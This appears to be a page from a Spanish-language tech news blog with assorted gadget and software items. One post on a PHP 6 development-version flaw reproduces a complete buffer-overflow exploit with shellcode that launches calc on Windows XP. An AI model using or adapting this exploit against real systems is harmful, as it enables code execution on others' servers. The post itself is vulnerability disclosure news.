Insectos ciborgs para misiones peligrosas de espionaje

Insectos con injertos tecnológicos, encontró la manera de aprovechar la energía que genera el movimiento de las alas para operar instrumentos en la observación de situaciones peligrosas, informó la Universidad de Michigan.

HTC Ville, el móvil ultra delgado

La competencia por el sector de los teléfonos inteligentes hace que los productos busquen diferenciarse de distinta manera. Este es el caso del nuevo terminal de los de HTC.

Nuevas MacBook Air de 15 pulgadas en el 2012

Apple suele actualizar los modelos de sus ordenadores, a nivel hardware, cada unos cuantos meses para no quedarse estancados. Algunas actualizaciones sólo mejoran un poco el almacenamiento y la velocidad en lo que al procesador y a la memoria RAM de refiere y, otras, viene con más novedades.

Descargar Linux Mint 12

Linux Mint 12 es un nuevo paso hacia delante, utilizando las nuevas tecnologías y un escritorio completamente nuevo. Linux Mint 12 "Lisa" Gnome 3 y MGSE Linux Mint 12 viene con un escritorio completamente nuevo, construido con Gnome 3 y MGSE.

Rio seco en Marte

Recientemente, la Agencia Espacial Europea (ESA) ha publicado unas fotografías, enviadas por la sonda europea Mars Express, que evidencian que el planeta rojo era recorrido por grandes cantidades de agua hasta hace menos tiempo del que se pensaba.

Lo ultimo de la tecnologia en tu E-mail

Epson NX420. Impresora WiFi

21:46  Unknown  2 comments


Epson nos sorprende con una impresora inalámbrica económica, se trata de la impresora Epson NX420 que aparece en el mercado con un precio de $99,99 (unos 80 EUR al cambio).

Esta impresora de Epson puede realizar impresiones, escanear y también hacer copias de documentos. En cuanto a la capacidad de escaneo tiene una resolución de 2400 ppp, que le confiere una muy aceptable calidad. Esta impresora ofrece una velocidad de impresiónde 6 ppm en negro y 3 ppm en color.

Por otra parte, integra la impresora NX420 una pantalla LCD de 1,5″ y la posibilidad de realizar fotocopias de documentos a dos caras para poder así ahorrar papel y energía, un aspecto en el que Epson siempre pone mucho esfuerzo: cuidar el Medio Ambiente, de tal forma que la propia impresora ha sido diseñada para poder ser reciclada en casi su totalidad.

Mas Informacion

Nueva versión del navegador Internet Explorer

11:05  Unknown  No comments


El grupo informático Microsoft anunció el miércoles el lanzamiento experimental de la próxima versión de su navegador, Internet Explorer 9, mientras que sufre una caída de este segmento del mercado.

Los programadores tienen acceso desde el miércoles a la 'IE9 Platform Preview', encargada de explotar lo mejor posible las posibilidades del estándar HTML5 para un acceso más rápido a los sitios de internet.

Microsoft prepara Internet Explorer 9 en un momentos en el que su cuota de mercado entre los navegadores de internet se encuentra debajo del 60%, cuando hace dos años se encontraba por encima del 75%, según la consultora de marketing Net Applications.

La porción de mercado de Internet Explorer 9 está evaluada en 59,95%, muy por delante de Firefox, de la fundación Mozilla (24,59%).

El navegador Chrome, lanzado por Google a fines de 2008, cuenta con un 6,73% de acceso a internet, por encima del navegador Safari de Apple (4,72%) y el noruego Opera (2,30%).

Mas Informacion

Fallo grave de seguridad en la versión de desarrollo de PHP 6,

20:33  Unknown  No comments

El problema se encuentra en la funcion str_transliterate() que permite “traducir” un texto de un lenguaje a otro, pero a su vez no valida adecuadamente los parámetros de entrada y permite la ejecución de código por medio de un buffer overflow.
Les dejo una PoC que explota esta vulnerabilidad sobre servidor Apache, corriendo en Windows XP SP3 y permite ejecutar la calculadora del sistema:
# Title: PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
# EDB-ID: 12051
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Pr0T3cT10n
# Published: 2010-04-04
# Verified: yes
# Download Exploit Code
# Download Vulnerable app
error_reporting(0);
#####################################################################
## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev
## Buffer Overflow
## Bug discovered by Pr0T3cT10n,
## Exploited by TheLeader, Debug
## SP. Thanks: HDM
## http://www.nullbyte.org.il
#####################################################################
## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC
## Take a look, 'unicode.semantics' has to be on!
## php.ini > unicode.semantics = on
#####################################################################
if(ini_get_bool('unicode.semantics')) {
$buff = str_repeat("u4141", 256);
$eip = "u1445u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll
$nops = str_repeat("u9090", 20);
# WinExec Calc XP SP3 HEB Unicode-encoded shellcode
$shellcode = "u02EBu05EBuF9E8uFFFFu33FFu5BC0u4388u8315u11C3uBB53u250Du7C86uD3FFu6163u636Cu414E";
# WinExec Calc XP SP3 EN Unicode-encoded shellcode (added by muts)
# $shellcode = "u02EBu05EBuF9E8uFFFFu33FFu5BC0u4388u8315u11C3uBB53u23ADu7C86uD3FFu6163u636Cu414E";
$exploit = $buff.$eip.$nops.$shellcode;
str_transliterate(0, $exploit, 0);
} else {
exit("Error! 'unicode.semantics' has be on!rn");
}
function ini_get_bool($a) {
$b = ini_get($a);
switch (strtolower($b)) {
case 'on':
case 'yes':
case 'true':
return 'assert.active' !== $a;
case 'stdout':
case 'stderr':
return 'display_errors' === $a;
default:
return (bool) (int) $b;
}
}
?>
Hay que recordar que esta versión de PHP aun esta en desarrollo, pero no deja de ser inquietante este tipo de problemas de carácter critico, en un lenguaje de programación tan extendido en la red, como lo es PHP.
Mas Información:
PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
Codigo en exploit-db.com

Mas Informacion

 
Share